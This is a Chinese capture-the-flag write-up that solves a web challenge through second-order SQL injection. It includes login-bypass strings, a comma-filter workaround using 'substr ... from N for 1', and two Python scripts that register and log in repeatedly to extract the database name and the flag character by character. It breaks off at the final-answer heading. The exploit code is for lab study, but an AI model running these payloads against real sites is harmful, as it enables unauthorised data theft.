一、环境:在线测试平台
二、进入界面先尝试万能账号
1'or'1'='1'#
换格式 hais1bux1
1@1'or'1'='1'#
三、万能的不行那我们就得想注册了,那注册文件是什么呢?不知道那就扫吧
两款工具:(cmd环境下)
dirmap-master、dirsearch-master
auex(我这里使用的是auex):
正常是register.php我这里不知道为什么乱码了?
注册个账号
发现用户名回显,我们考虑二次注入
很明显是二次注入
四、如何解决?
在mysql中我们熟知一点是,+可以当做数学运算符 ,比如我们执行
select ‘1’+‘2a’
返回值为空
select '0'+database();
当我们用ASCII值来计算时,此时出现库第一位s的ASCII码值
select '0'+ascii(substr(database(),1,1));
五、当我们在题目中用,后发现很明显有过滤
会nonono!
那到底过滤掉了我们什么字符
写个字典吧!
抓包去试试吧!检测username到底在过滤什么东西
引入我们刚才的字典
开始尝试,302便是已经跳转了,200是被拦截住还在原网站,很明显我们的,和information是被过滤掉了
单引号我看还能访问应该是误报吧
因为题目中过滤掉了逗号,因此用from for来代替
0'+ascii(substr(database() from 1 for 1))+'0;
成功回显管理员第一个字母w,当然后面可以多次注入,最后拼接数据库名为web,表名我们直接就猜flag了,当然你也可以通过mysql默认的sys去进行注入出来因为information被禁用了
自己写的脚本如下:
# -*- coding:utf-8 -*-
"""
@Author: lingchenwudiandexing
@contact: 3131579667@qq.com
@Time: 2024/2/19 1:04
@version: 1.0
"""
import requests
import logging
import re
from time import sleep
# LOG_FORMAT = "%(lineno)d - %(asctime)s - %(levelname)s - %(message)s"
# logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)
def search():
flag = ''
url = 'http://19f46d59-6746-4dce-84c1-73a67354f6d1.node5.buuoj.cn/'
url1 = url+'register.php'
url2 = url+'login.php'
for i in range(100):
sleep(0.3)#不加sleep就429了QAQ
data1 = {"email" : "1234{}@123.com".format(i), "username" : "0'+ascii(substr((select * from flag) from {} for 1))+'0;".format(i), "password" : "123"}
data2 = {"email" : "1234{}@123.com".format(i), "password" : "123"}
r1 = requests.post(url1, data=data1)
r2 = requests.post(url2, data=data2)
res = re.search(r'<span class="user-name">\s*(\d*)\s*</span>',r2.text)
res1 = re.search(r'\d+', res.group())
flag = flag+chr(int(res1.group()))
print(flag)
print("final:"+flag)
if __name__ == '__main__':
search()
官方脚本如下:
import requests
import time
from bs4 import BeautifulSoup #html解析器
def getDatabase():
database = ''
for i in range(10):
data_database = {
'username':"0'+ascii(substr((select database()) from "+str(i+1)+" for 1))+'0",
'password':'admin',
"email":"admin11@admin.com"+str(i)
}
#注册
requests.post("http://220.249.52.133:36774/register.php",data_database)
login_data={
'password':'admin',
"email":"admin11@admin.com"+str(i)
}
response=requests.post("http://220.249.52.133:36774/login.php",login_data)
html=response.text #返回的页面
soup=BeautifulSoup(html,'html.parser')
getUsername=soup.find_all('span')[0]#获取用户名
username=getUsername.text
if int(username)==0:
break
database+=chr(int(username))
return database
def getFlag():
flag = ''
for i in range(40):
data_flag = {
'username':"0'+ascii(substr((select * from flag) from "+str(i+1)+" for 1))+'0",
'password':'admin',
"email":"admin32@admin.com"+str(i)
}
#注册
requests.post("http://220.249.52.133:36774/register.php",data_flag)
login_data={
'password':'admin',
"email":"admin32@admin.com"+str(i)
}
response=requests.post("http://220.249.52.133:36774/login.php",login_data)
html=response.text #返回的页面
soup=BeautifulSoup(html,'html.parser')
getUsername=soup.find_all('span')[0]#获取用户名
username=getUsername.text
if int(username)==0:
break
flag+=chr(int(username))
return flag
print(getDatabase())
print(getFlag())
五、最终答案: